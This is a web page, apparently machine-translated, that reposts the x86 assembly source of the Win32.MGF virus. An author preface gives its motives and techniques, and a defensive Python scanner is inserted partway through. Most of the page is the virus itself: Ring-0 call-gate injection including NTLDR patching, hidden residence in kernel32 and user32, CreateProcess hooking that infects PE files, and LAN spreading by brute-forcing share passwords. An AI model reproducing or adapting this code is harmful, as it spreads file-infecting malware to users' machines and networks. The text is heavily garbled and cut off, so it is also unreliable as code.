"Mo National Defense" virus (Win32.MGF) source program

zhaozj2021-02-12  155


Warning: this program is for study and research only. You are not permitted to modify it into new virus variants, and you are not permitted to add destructive code. Remember that!

Motivation: 1. As a tribute to Chen Ying-hao, aiming to go one better than CIH; 2. To exchange technique and raise the country's level (if you read this source and trace a virus through, your skill will grow); 3. To let the world know that China is still here.

Techniques used: 1. Entering Ring 0: on Win98 a CallGate is added directly to the GDT; on Windows 2000/XP/2003 the CallGate is written into NTLDR and takes effect after a reboot (original technique; this is also a vulnerability of Windows 2000/XP/2003). 2. Memory residence: once a DLL module is loaded into memory only 1K of its header page is in use, leaving 3K free, so this virus puts 3K of itself in the gap in kernel32.dll and the remaining 2K in user32.dll; Win98 is a special case, and there the 2K goes into memory allocated through the VxD _PageAllocate. The virus does not reside in an ordinary process or in GlobalAlloc memory but in module gaps, so it shows up neither as a process nor as a module, and because it infects files while resident in memory it is hard to detect and remove. This is the point! Much anti-virus software either cannot find this virus or, having found it, cannot remove it from memory and is left helpless (original technique). 4. LAN propagation: crack the remote host's share password with its own password generator, then copy the virus into the other side's Startup folder. 5. Email propagation: no such function at present!

Hazard estimate: 1. It affects the normal operation of the infected machine; 2. Operation (go ask Bill Gates; who told him to load you with the unbearable weight of MPR?); 3. There is absolutely no data destruction, BIOS overwriting, information theft or other malicious behaviour.

The technique keeps improving; maybe there will be an even more powerful virus, heh heh.

.586p.model flat, stdcalloption casemap: None

INCLUDE Windows.Include kernel32.incinclude user32.incinclude advapi32.include mpr.incincludelib kernel32.libincludelib user32.libludelib advapi32.libincludelib mpr.lib

VirusSize = VirusEnd-offset VirusStartVirusSizeP1 = offset _OtherMemPosition-offset VirusStart offset; IBDV VirusSizeP2 = VirusSize-VirusSizeP1 infected PE file memory portion; the second half of this toxic, inactive .codeVirusStart: noppushfdpushad

DB 0E8H, 0, 0, 0; this is a call command, which is equivalent to the Push Eippop EBX; EBX = EBX instructions in memory actual address MOV EDX, EBXMOV EBXSUB EBX, $ - 5; actual address - Design address = address difference = replacement value = EbxSub EDX, 8Call _getmoduleAddress; get the loading address of this process Add Eax, [EBX 3CH] MOV LPOLDPE [EBX], EAXSUB EDX, [EAX 28h] Sub Edx, [EAX 34h] add virusexit [ebx], edx; edx = repositioning value of this process, correct the original program entry

Mov Eax, [ESP 24h] Call_getmoduleaddress; get hkernel32mov hkernel32 [ebx], EAXMOV CALLGATESEL [EBX], 103H

Call_getc3address; find the address of RET (0xc3) in the kernel32.dll module

lea esi, [ebx FunctionNameTab 8]; first obtain LoadLibraryA, GetProcAddress, GetVersion address lea edi, FunctionAddressTab [ebx] mov ecx, 3 @@: lodsdadd eax, ebxpush eaxpush hKernel32 [ebx] call _GetProcAddressstosdloop @b

Call dwgetversion [EBX] SHR EAX, 31MOV DWVERSION [EBX], EAX; Windows version is put in dWVersion variable, 98 = 1, 2000 / xp / 2003 = 0

Call _ISwindows9x; if Win98 is immediately added to GDT to add Callgate

LEA ESI, [EBX FunctionNameTab 4 * 7] MOV ECX, 4 @@: lodsdadd EAX, EBX.IF DWVERSION [EBX] MOV BYTE PTR [EAX-2], 'a'.elsemov Byte PTR [EAX-2] , 'W'..ndifloop @B; process ANSI / UNICODE API function name

Call _ProcessimportTab; import all API functions

Lea Eax, Szuser32 [EBX] Push EaxCall DwloadLibrary [EBX] MOV HUSER32 [EBX], EAX

XOR edx, edxlar edx, callgatesel [ebx] .IF DH! = 0ech; if it is the first infection of 2000 / XP / 2003, write CallGate into NTLDR, infecting the desktop's shortcuts corresponding to the EXE file, waiting to restart the CallGate take effect

Push 4LEA Eax, SZNTLDR [EBX] Push EaxCall_Editfile

Call_Editlnkfile

.ELSE; if it is a 2000 / XP / 2003 in Win98 or memory, enter Ring0DW 9BffHDD Offset CallgateSel-4MOV EAX, Espmov ESP, [ESP 4]; Switch Stack Push Eaxmov Eax, CR0BTR EAX, 16MOV CR0, EAX Remove the Keernel32 module read-only memory page write protection

MOV EAX, LPOLDPE [EBX] MOV EDX, DWOLDENTRY [EBX] MOV [EAX 28H], EDXMOV EDX, DWOLDIMAGE [EBX] MOV [EAX 50H], ​​EDX; Recovery Process Inlet and Image Size, Action Some Programs Self-protection

MOV EDI, HKERNEL32 [EBX] Add Edi, [EDI 3CH] MOV EDI, [EDI 54H] Add Edi, Hkernel32 [EBX] MOV LPMEMPSITION1 [EBX], Edilea ESI, VirusStart [EBX] MOV ECX, 10HREPZ CMPSB; Judgment Whether the virus is already in memory

.IF! ZERO?; NOT IN MEM.IF DWVERSION [EBX]; Not in memory push 0fhpush 0push -1push 0push 0push 0push 1push 1 @@: int 20h; vxd -> _ PageAllocatedd 00010053hadd ESP, 8 * 4le EDI, @ b [ebx ] MOV WORD PTR [EDI], 20CDHMOV DWORD PTR [EDI 2], 00010053H.ELSEMOV EAX, HUSER32 [EBX] Add Eax, [EAX 3CH] MOV EAX, [EAX 54H] Add Eax, HUSER32 [EBX]; 2000 / XP / 2003 --- "EAX = USER32.DLL module voids .Endifmov lpMemPosition2 [EBX], EAX

MOV EDI, LPMEMPSITION1 [EBX] Add Edi, Offset_BeforeApi-Offset VirusStartmov DWORD PTR [EBX SZNewcommand 1], EDI; Construction Jump Transfer to the command of the CreateProcess interception function

Mov ESI, DWCREATEPROCESS [EBX] Push Esilea EDI, SZOLDCOMMAND [EBX] MOV ECX, 6REP MOVSB; saving the top 6 bytes of CREATEPROCESS functions

Lea ESI, SZNewcommand [EBX] Pop Edimov ECX, 6Rep Movsb; Transform the first instruction of the CreateProcess function to jump into the intercept function

Lea ESI, VirusStart [EBX] MOV EDI, LPMEMPSITION1 [EBX] MOV ECX, VirussizeP1Rep Movsb; Front 3K Residence in Kernel32 Module

Mov EDI, Eaxmov ECX, VirussizeP2Rep Movsb; 2K after virus resides in the user32 module or vxd _pageallocate points to the page .enDIF

POP Esplea Eax, @ f [EBX] Push EaxRetf; return @@:

.endif

; Create thread for net taint.if dwVersion [ebx]; create infection LAN threads call _MemToFilelea eax, dwVersion [ebx] push eaxpush 0push 0lea eax, _GoLAN [ebx] push eaxpush 0push 0call dwCreateThread [ebx] .endif

ENTER 32, 0; Judgment Site Conditions Push EspCall Dwgetlocaltime [EBX] MOV AX, [ESP 2] MOV DL, 3DIV DL.IF AH == 0 && Word PTR [ESP 4]> = 5push 0le Eax, SzmessageTit [EBX ] Push Eaxle Eax, SzmeSsageText [EBX] Push Eaxpush 0Call DwMessageBox [EBX] .EndifleavePopadPOPFD

DB 68HVIRUSEXIT: DD OFFSET @f; if the virus returns the original program entry, return the control right to the original program; if the virus runs independently, @@:; Go back to the kernel32.dll module, exit the virus process (advanced skills, do not rely on EXITPROCESS). RET

Hkernel32 DD 0HUSER32 DD 0SZUSER32 DB 'USER32.DLL', 0

DWC3ADDRESS DD 0

DwoldImage DD 3000HDWoldentry DD 1000 HLPoldpe DD 0lpMemPosition1 DD 0lpMemPosition2 DD 0

DWVERSION DD 0CALLGATESEL DD 103H

Intercepting the first half of CreateProcess, mainly determined that the previous 6-byte of the original function is restored to ensure CREATEPROCESS; return to the second half of the intercepting function _beforeforeapi: pushfd; extend the stack space, the second half of the block Address Pushfd; Extended Stack Space, CreateProcess's Parameter Top 4 Byte Used Space Pushfd; Save Site PushadCLD

DB 0e8H, 0, 0, 0; Push Eippop EbxSub EBX, $ - 1; EBX = Relocation Value

MOV EDI, DWCREATEPROCESS [EBX] MOV [ESP 24h], Edilea ESI, SzoldCommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSB; enter Ring0 Restore CreateProcess's first 6 bytes of Lea Eax, @ f [ebx] PUSH EaxRetf @@:

MOV EAX, LPMEMPSITION1 [EBX] add eax, offset _behindapi-offset virusstartXCHG EAX, [ESP 2CH]; call the code of the CREATEPROCESS function to return the address, exchange the address of the intercepting function

Lea ESI, [ESP 2CH] Lea EDI, [ESP 28H] MOV ECX, 11REP MOVSDSTOSD; 10 parameters of the CreateProcess function move 4 bytes, and finally returned the address to the stack

MOV ESI, [ESP 28H 4]; the path to the EXE file. IF! ESIMOV ESI, [ESP 28H 4 4] .endif

ENTER 100H, 0xOR Eax, Eaxmov ECX, 100HLA EDI, [EBP-100H] Rep Stosb

XOR EDX, EDXLEA EDI, [EBP-100H] MOV ECX, 80H @@ :. if dwversion [ebx]

Lodsb.if al == 0stosbmov DL, 2.ELSEIF AL == 22Hinc Edx.elsestosb.Endif

.lse

Lodsw.if AX == 0stoswmov DL, 2.ELSEIF AX == 22 Hinc Edx.elsestosw.endif.Endif

CMP DL, 2LOOPNZ @B

.IF dwversion [EBX] Lea ESI, [EBP-100H 2] .elselea ESI, [EBP-100H 4] .ndifmov ECX, 4 @@ :. if dwversion [EBX] Lodsb.elselodsw.Endifshrd Edx, Eax, 8LOOP @BAND EDX, 0DFDFDFDFH; lowercase switch CMP EDX, 'niw /' jz @ f.if! Dwversion [ebx] && edx == 'ORP /' JMP @ F.Endif

Lea Edx, [EBP-100H]

Push 1Push Edxcall_Editfile; Infecting CreateProcess opened PE file

@@: LeavePopadPOPFDRET; Back to the original CreateProcess continues to execute

_Behindapi:; CREATEPROCESS will be jumped here, here is responsible for restoring its first 6 bytes as jump instructions, jump to the first half of the blocking function PushfdpushadCld

DB 0E8H, 0, 0, 0, 0POP EBXSUB EBX, $ - 1

Mov EDI, DWCREATEPROCESS [EBX] Lea ESI, SZNewcommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSBLEA EAX, @ f [EBX] Push EaxRetf @@:

PopadPopfdret; here really returning to CreateProcess address SzoldCommand DB 6 DUP (0) Sznewcommand DB 68H, 0, 0, 0, 0, 0C3HDB 0

Infecting the subprogram of the PE document; _dwflag ----- bit 0: 0 = NTLDR, 1 = pe; bit 1: 0 = MEM, 1 = file; bit 2: 0 = auto (ANSI / Unicode), 1 = ansi_EditFile proc _lpFileName, _dwFlaglocal @hFilelocal @hFileMaplocal @lpFileMaplocal @dwFileSizelocal @dwFileAttributeslocal @ stFileTime1: FILETIMElocal @ stFileTime2: FILETIMElocal @ stFileTime3: FILETIMEpushad

push _lpFileNamebt _dwFlag, 2.if CARRY call dwGetFileAttributesA [ebx] .elsecall dwGetFileAttributes [ebx] .endif; invoke GetFileAttributes, _lpFileName.if eax = - 1mov @ dwFileAttributes, eax?!

Push 80HPUSH _LPFILENAMEBT _DWFLAG, 2.IF Carry? Call DWsetFileAttributesa [EBX] .lsecall dwsetfileAttributes [EBX] .endif; Invoke setFileAttributes, _lpfilename, 80h

push 0push 80hpush 3push 0push 3push 0c0000000hpush _lpFileNamebt _dwFlag, 2.if CARRY call dwCreateFileA [ebx] .elsecall dwCreateFile [ebx] .endif;? invoke CreateFile, _lpFileName, 0c0000000h, 0,0,3,80h, 0.if eax =! 0FFFFFFFHMOV @ Hfile, Eaxpush EaxCall DwgetFileType [EBX] .IF EAX == file_type_disk

Push 0push @HfileCall DwgetFilesize [EBX]; Invoke getFileSize, @ hfile, 0mov @ dwfilesize, EAX

lea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwGetFileTime [ebx]; invoke GetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2, addr @ stFileTime3

Push 0push 0push 0push 4push 0push @HfileCall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, @ Hfile, 0, 4, 0, Eax, 0.if Eaxmov @ HfileMap, EAX

Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX

Bt _dwflag, 0.if carry? .if Word PTR [EAX] == 'zm'.if DWORD PTR [EAX 20H]! =' fgm'add Eax, [EAX 3CH] .IF DWORD PTR [EAX] = = 'EP'BT DWORD PTR [EAX 16H], 13.IF! Carry?

Push @lpfilemapcall dwunmapviewoffile [ebx]

Push @HfilemapCall DWCloseHandle [EBX]

Mov Eax, @ dwfilesizeadd eax, virussize; if it is a PE file that meets the condition, file size extension Virussize bytes

Push 0push eaxpush 0push 4push 0push @HfileCall dwcreatefilemapping [EBX] MOV @ HFILEMAP, EAX

Push 0push 0push 0push 6push eaxcall dwmapviewoffile [EBX] MOV @ lpfilemap, EAX

Add Eax, [EAX 3CH] MOVZX ECX, Word PTR [EAX 6] DEC ECXXCHG EAX, ECXMOV EDX, 28HMUL EDXCHG EAX, ECXMOVZX EDX, WORD PTR [EAX 14H] Add Edx, 18HADD EDX, EaxAdd Edx, ECX; Positioning in the last section

mov edi, @ lpFileMapadd edi, @ dwFileSizebt _dwFlag, 1.if CARRY? lea esi, VirusStart [ebx] mov ecx, VirusSizepushadrep movsbpopad.elsemov esi, lpMemPosition1 [ebx] mov ecx, VirusSizeP1pushadrep movsb.if dwVersion [ebx] mov esi, lpMemPosition2 [ebx] .elselea eax, szUser32 [ebx] push eaxcall dwLoadLibrary [ebx] mov esi, eaxadd esi, [esi 3ch] mov esi, [esi 54h] add esi, eax.endifmov ecx, VirusSizeP2rep movsbpopad.endif; Write the virus code into file MOV ECX, @ dwfilesizeadd ecx, virussizesub ECX, [EDX 14H] MOV [EDX 8], ECXMOV [EDX 10H], ECXMOV DWORD PTR [EDX 24H], 0E00000E0HMOV ECX, [EAX 50h] mov esi, offset dwOldImage-offset VirusStartmov [edi esi], ecxmov ecx, [eax 28h] mov esi, offset dwOldEntry-offset VirusStartmov [edi esi], ecxadd ecx, [eax 34h] mov esi, offset Virusexit-Offset VirusStartmov [EDI ESI], ECXSUB EDI, @ lpfilemapsub EDI, [EDX 14H] Add EDI, [EDX 12] MOV [EAX 28H], Edimov ECX, [EDX 12] Add ECX, [EDX 8] and cx, 0f000hadd ECX, 1000HMOV [EAX 50H], ​​ECXMOV ECX, @ lpfilemapmov DWORD PTR [ECX 20H], 'FGM'; modify PE file header and write infected sign MGF

.endif; 'DLL'

.endif; 'EP'

.endif ;! 'fgm'

.endif; 'zm'

.else; _dwFlag; if it is NTLDR file, write CALLGATElea esi, szGdtData [ebx] mov edi, @ lpFileMapmov ecx, @ dwFileSize @@: inc edipush esipush edipush ecxmov ecx, 10hrepz cmpsbpop ecxpop edipop esiloopnz @b

. IF ZERO? XOR EAX, Eaxmov ECX, 80H @@: Sub EDI, 8PUSH EDIPUSH ECXMOV ECX, 8REPZ ScaSBPOP ECXPOP EdiloOPnz @B

.IF ZERO? Add Edi, 100HLEA ESI, SZCallgate [EBX] MOV ECX, 10HREP MOVSB

MOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI-16], DXSHR EDX, 16MOV Word PTR [EDI-10], DX.Endif

.endif

.ndif; _dwflag

Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif

push @hFileMapcall dwCloseHandle [ebx]; invoke CloseHandle, @ hFileMap.endiflea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwSetFileTime [ebx]; invoke SetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2 Addr @ stfiletime3.endif

Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif

push @dwFileAttributespush _lpFileNamebt _dwFlag, 2.if CARRY call dwSetFileAttributesA [ebx] .elsecall dwSetFileAttributes [ebx] .endif;? call dwSetFileAttributes [ebx]; invoke SetFileAttributes, _lpFileName, @ dwFileAttributes.endif

POPADRET_EDITFILE ENDP

Szgdtdata DW 0FFFH, 0000, 9A00H, 00cfh, 0FFFH, 0000, 9200H, 00CFHSZCallgate DW 0000, 0108H, 0EC00H, 0000, 0FFFH, 0000, 9A00H, 00cfh

SZNTLDR DB 'C: / NTLDR', 0
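The _EditFile routine above leaves two header-level traces in every file it touches: it stamps 'MGF' into the reserved e_res area of the DOS header (the already-infected test at offset 20h) and appends itself to the last section, whose characteristics it sets to 0E00000E0h before moving the entry point there. As an added defender-side example that is not part of the original source, the following Python triage script parses only the PE headers and reports both traces; the sample images it scans are constructed headers, not real programs, and scan_pe/build_sample are names chosen here.

```python
"""Header-level triage for the Win32.MGF infection pattern described on this page."""
import struct

MGF_MARKER = b"MGF"            # stamped into the DOS header's reserved e_res area at 0x20
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR_SIZE = 40


def scan_pe(data: bytes) -> dict:
    """Return {'is_pe', 'marker', 'suspicious_entry'} for one file image.

    marker:           the 'MGF' already-infected stamp the infector tests before infecting
    suspicious_entry: entry point lies inside the LAST section and that section is both
                      writable and executable (the infector appends to the last section and
                      sets its characteristics to 0E00000E0h); a generic appender heuristic.
    """
    result = {"is_pe": False, "marker": False, "suspicious_entry": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return result
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 0x2C > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return result
    result["is_pe"] = True
    result["marker"] = data[0x20:0x23] == MGF_MARKER
    (nsect,) = struct.unpack_from("<H", data, e_lfanew + 0x06)      # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 0x14)   # SizeOfOptionalHeader
    (entry,) = struct.unpack_from("<I", data, e_lfanew + 0x28)      # AddressOfEntryPoint
    if nsect == 0:
        return result
    last = e_lfanew + 0x18 + opt_size + (nsect - 1) * SECTION_HDR_SIZE
    if last + SECTION_HDR_SIZE > len(data):
        return result
    vsize, vaddr, rawsize = struct.unpack_from("<III", data, last + 8)
    (chars,) = struct.unpack_from("<I", data, last + 36)            # Characteristics
    in_last = vaddr <= entry < vaddr + max(vsize, rawsize)
    rwx = bool(chars & IMAGE_SCN_MEM_EXECUTE) and bool(chars & IMAGE_SCN_MEM_WRITE)
    result["suspicious_entry"] = in_last and rwx
    return result


def build_sample(infected: bool) -> bytes:
    """Constructed minimal PE32 header (headers only, not a runnable program) for scan_pe.

    The 'infected' variant mimics what _EditFile leaves behind: marker in e_res, entry
    point relocated into the last section, last section flagged 0E00000E0h.
    """
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    if infected:
        dos[0x20:0x23] = MGF_MARKER
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # i386, 2 sections
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3010 if infected else 0x1000)  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                        # ImageBase
    sec = "<8sIIIIIIHHI"
    text = struct.pack(sec, b".text", 0x1000, 0x1000, 0x1000, 0x400, 0, 0, 0, 0, 0x60000020)
    data_chars = 0xE00000E0 if infected else 0xC0000040
    data = struct.pack(sec, b".data", 0x1000, 0x3000, 0x1000, 0x1400, 0, 0, 0, 0, data_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text + data


if __name__ == "__main__":
    for label, blob in (("clean", build_sample(False)), ("infected", build_sample(True))):
        print(label, scan_pe(blob))
```

A real sweep would feed scan_pe the first few KiB of each .exe on disk; the marker is specific to this family, while the last-section heuristic also fires on other appenders and on some packers.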

The getProcadDress function, usage and kernel32.dll's getProcaddress _GetProcaddress proc buy ES ESI EDI, _HModule, _lpszprocnamelocal @dwsize

Mov Edx, _HModuleAdd Edx, [EDX 3CH] MOV EDX, [EDX 78H] Add Edx, _HModuleMov ECX, [EDX 18H] MOV ESI, [EDX 20H] MOV EDI, _LPSZPROCNAME

Push EDIPUSH ECXXOR EAX, EAXMOV ECX, 0FFFFFFFHREPNZ ScaSBNOT ECXDEC ECXMOV @ dwsize, ECX; Calculation Function Name Length POP ECXPOP EDI

Add ESI, _HModule @@: Push Edipush ECXMOV ECX, @ DWSELODSDADD EAX, _HModulexchg Eax, ESIREPZ CMPSBXCHG EAX, ESI Pop EcxPop EdiloPnz @B

.IF! ZERO? xor Eax, EaxRet.endif

Sub ESI, _HModulesub ESI, 4SUB ESI, [EDX 20H] SHR ESI, 1Add ESI, [EDX 24h] Add ESI, _HModuleLodsdmovzx ESI, AXSHL Eax, 2AX, [EDX 1CH] Add Eax, _HModuleMov Edx, [EAX ] add edx, _hmodulexchg Edx, EAX

RET_GETPROCADDRESS ENDP

Words of the LAN _Golan Proc Lparamlocal @Henumlocal @dwcountlocal @szResourceName [32]: Bytelocal @szbuffer [0C00H]: Bytepushad

DB 0E8H, 0, 0, 0POP EBXSUB EBX, $ - 1LEA EAX, @ Henumbush Eaxpush 0push 13hpush 0push 5call dwwnetopENENUM [EBX]

.if! eax.repeatmov @ dwcCount, -1lea eax, dwBufferSize [ebx] push eaxlea eax, @ szBufferpush eaxlea eax, @ dwcCountpush eaxpush @hEnumcall dwWNetEnumResource [ebx] cmp dword ptr [@ szBuffer 14h], 0jnz @ f.until Eaxpush @henumcall dwwnetcloseenum [ebx] .endifjmp _golaanexit

@@: push @henumcall dwwnetcloseenum [EBX] Lea EDI, @ szbuffer

_Nextpc: Push Edimov ESI, [EDI 14H] Lea EDI, @ SzResourceName @@: lodsbstosbor al, aljnz @BMOV DWORD PTR [EDI-1], 'C /' Pop Edi

XOR Eax, Eaxmov DWPassword [EBX], EAX

@@: lea edx, szlocaldrive [ebx] Push Edxpush EaxLea EDX, @ SzResourceNamepush EDXCALL DWNETADCONNECTION [EBX] .IF EAX == 56HCALL _GENPASSWORDCMP DWPASSWORD [EBX], 0JNZ @ B.ELSEIF! EAX

Push 0le Eax, Szdfile [EBX] Push Eaxlea Eax, Szsfile [EBX] Push EaxCall DwcopyFile [EBX]; If you find writable sharing, infecting MOV ESI, EAX

Push 1LEA Eax, Szlocaldrive [EBX] Push EaxCall Dwwnetcancelconnection [EBX] Call _genpasswordor ESI, ESIJZ @B

.endif

Add Edi, 20HDEC @dwccountjnz _nextpc

_Golanexit: popad_golan endp

SzmemTofilename DB 'UNBLASTER.EXE', 0SZSFILE DB 'C: /WINDOWS/SYSTEM/UNBLASTER.EXE', 0SZDFILE DB 'X: / Windows / All Users / Start Menu / Programs / Start /unblaster.exe' ,0

DWPassword DD 0DD 0, 0Szpassword DB 0SzlocalDrive DB 'x:', 0DWBuffersize DD 0C00H

_Genpassword:; generated subroutine, password includes 1234567890! @ # $% ^ Character STD

Pushadlea EDI, [EBX SZPassword-1] xor Edx, Edxmov Eax, Dwpassword [EBX] MOV ECX, 16

@@: div ECXXCHG EAX, EDX.IF AL <= 5ADD Al, 21h.ELSE; if Al> = 6 && Al <= 15ADD Al, 2AH.Endifstosbxor Eax, Eaxxchg Eax, Edxor Eax, Eaxjnz @B

Inc Ediinc DWPassword [EBX] MOV [ESP 20H-4], EDIPOPADCLDRET

_MEMTOFILE PROC; restore virus itself subroutine local @hfilelocal @Hfilemaplocal @lpfilemaplocal @lpsystemdir [40h]: Byte

push 40hlea edi, @ lpSystemDirpush edicall dwGetSystemDirectory [ebx]; invoke GetSystemDirectory, addr @ lpSystemDir, 100hadd edi, eaxmov al, '/' stosblea esi, szMemToFileName [ebx] mov ecx, 16rep movsb

push 0push 80hpush 2push 0push 0push 0c0000000hlea eax, @ lpSystemDirpush eaxcall dwCreateFileA [ebx];! invoke CreateFile, addr @ lpSystemDir, 0c0000000h, 0,0,2,80h, 0.if eax = 0ffffffffhmov @ hFile, eax

Mov Edx, VirussizeAdd Edx, 200h

Push 0PUSH EDXPUSH 0PUSH 4PUSH 0PUSH EaxCall dwcreatefilemapping [EBX]; Invoke CreateFileMapping, Eax, 0, 4, 0, EDX, 0.IF Eaxmov @ HfileMap, EAX

Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX

Mov EDI, ESMOV ESI, Hkernel32 [EBX] MOV ECX, 0A8HREP MOVSB; with Kernel32 DOS head MOV DWORD PTR [EAX 3CH], 0A8HMOV DWORD PTR [EAX 20H], 'Fgm'lea ESI, FileHead [EBX] MOV ecx, 120hrep movsb; original PE header xor eax, eaxmov ecx, 38hrep stosblea esi, VirusStart [ebx] mov ecx, VirusSizepush edirep movsb; virus code pop edimov esi, offset VirusExit-offset VirusStartmov dword ptr [edi esi], offset VirusExit 4

Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif

Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif

Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif

RET_MEMTOFILE ENDP

_ProcessimportTab:; Handmade Import Functions Lea ESI, FunctionNameTab [EBX] Lea Edi, FunctionAddresStab [EBX] @@: Lodsd

.IF EAX == 0ffffffffhlodsdadd Eax, EBXPUSH EAXCALL DWLOADLIBRARY [EBX] MOV ECX, EAX

.ELSEIF EAXADD EAX, EBXPUSH ECXPUSH EAXPUSH ECXCALL DWGETPROCADDRESS [EBX] Stosdpop Ecx.Endifor Eax, Eaxjnz @B

RET

_ISWINDOWS9X:; Add Callgate subroutine to Win98. IF! ZERO?; WIN9XXOR ECX, ECXPUSH ECXPUSH CXSGDT FWORD PTR [ESP] POP ​​CXPOP EDISUB ECX, 8and CL, 0F8hor Cl, 3MOV Callgatesel [EBX], ECX

XOR EDX, EDXLAR EDX, ECX

.IF DH! = 0echand CL, 0F8HMOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI ECX], DXSHR EDX, 16MOV Word PTR [EDI ECX 6], DXMOV DWORD PTR [EDI ECX 2], 0ec000028h .endif

.endifret

_Getmoduleaddress: @@: and ax, 0f000HSUB EAX, 1000HCMP WORD PTR [EAX], 'zm'jnz @BMOV ECX, EaxAdd ECX, [ECX 3CH] CMP DWORD PTR [ECX],' ep'jnz @bret

_Getc3address: Mov Edi, Hkernel32 [EBX] Add Edi, 1000HMOV ECX, 20000HMOV AL, 0C3HCLDREPNZ ScaSBDEC Edimov DWC3ADDRESS [EBX], EDIRET

FunctionAddressTab: dwLoadLibrary dd 0dwGetProcAddress dd 0dwGetVersion dd 0dwCloseHandle dd 0dwCreateProcess dd 0dwCreateFile dd 0dwGetFileAttributes dd 0dwSetFileAttributes dd 0dwCreateFileA dd 0dwGetFileAttributesA dd 0dwSetFileAttributesA dd 0dwGetSystemDirectory dd 0dwCreateFileMapping dd 0dwCreateThread dd 0dwGetFileSize dd 0dwGetFileTime dd 0dwSetFileTime dd 0dwGetFileType dd 0dwGetLocalTime dd 0dwCopyFile dd 0dwMapViewOfFile dd 0dwUnmapViewOfFile dd 0dwFindFirstFile dd 0dwFindNextFile dd 0dwFindClose dd 0dwMessageBox dd 0dwRegCloseKey dd 0dwRegCreateKeyEx dd 0dwRegOpenKeyEx dd 0dwRegQueryValueEx dd 0dwRegSetValueEx dd 0dwWNetAddConnection dd 0dwWNetCancelConnection dd 0dwWNetCloseEnum dd 0dwWNetEnumResource dd 0dwWNetOpenEnum dd 0

_Thermemposition:; 2K in the second half of elsewhere

FunctionNameTab: dd 0ffffffffhdd offset szKernel32dd offset szLoadLibraryAdd offset szGetProcAddressdd offset szGetVersiondd offset szCloseHandledd offset szCreateProcessdd offset szCreateFiledd offset szGetFileAttributesdd offset szSetFileAttributesdd offset szCreateFileAdd offset szGetFileAttributesAdd offset szSetFileAttributesAdd offset szGetSystemDirectoryAdd offset szCreateFileMappingAdd offset szCreateThreaddd offset szGetFileSizedd offset szGetFileTimedd offset szSetFileTimedd offset szGetFileTypedd offset szGetLocalTimedd offset szCopyFileAdd offset szMapViewOfFiledd offset szUnmapViewOfFiledd offset szFindFirstFileAdd offset szFindNextFileAdd offset szFindClosedd 0ffffffffhdd offset szUser32dd offset szMessageBoxAdd 0ffffffffhdd offset szADVAPI32dd offset szRegCloseKeydd offset szRegCreateKeyExAdd offset szRegOpenKeyExAdd offset szRegQueryValueExAdd offset szRegSetValueExAdd 0ffffffffhdd offset szMPRdd offset szWNetAddConnectionAdd offset szWNetCancelConnectionAdd offset szWNe TcloseEnumdd Offset SzwneetenumResourceAdd Offset SzwNetopeNenumAdd 0

szKernel32 db 'kernel32.dll', 0szLoadLibraryA db 'LoadLibraryA', 0szGetProcAddress db 'GetProcAddress', 0szGetVersion db 'GetVersion', 0szCloseHandle db 'CloseHandle', 0szCreateProcess db 'CreateProcessW', 0szCreateFile db 'CreateFileW', 0szGetFileAttributes db 'GetFileAttributesW', 0szSetFileAttributes db 'SetFileAttributesW', 0szCreateFileA db 'CreateFileA', 0szGetFileAttributesA db 'GetFileAttributesA', 0szSetFileAttributesA db 'SetFileAttributesA', 0szGetSystemDirectoryA db 'GetSystemDirectoryA', 0szCreateFileMappingA db 'CreateFileMappingA', 0szCreateThread db 'CreateThread', 0szGetFileSize db 'GetFileSize', 0szGetFileTime db 'GetFileTime', 0szSetFileTime db 'SetFileTime', 0szGetFileType db 'GetFileType', 0szGetLocalTime db 'GetLocalTime', 0szCopyFileA db 'CopyFileA', 0szMapViewOfFile db 'MapViewOfFile', 0szUnmapViewOfFile db 'UnmapViewOfFile', 0szFindFirstFileA db 'FindFirstFileA', 0szFindNextFileA db 'FindNextFileA ', 0SzFindClose DB' FindClose ', 0; Szuser32 DB' User32.dll ', 0SzMessageBoxa DB' MessageBoxa ', 0szADVAPI32 db 'ADVAPI32.dll', 0szRegCloseKey db 'RegCloseKey', 0szRegCreateKeyExA db 'RegCreateKeyExA', 0szRegOpenKeyExA db 'RegOpenKeyExA', 0szRegQueryValueExA db 'RegQueryValueExA', 0szRegSetValueExA db 'RegSetValueExA', 0szMPR db 'MPR.dll', 0szWNetAddConnectionA db 'WNetAddConnectionA ', 0SzwnetCancelConnectiona 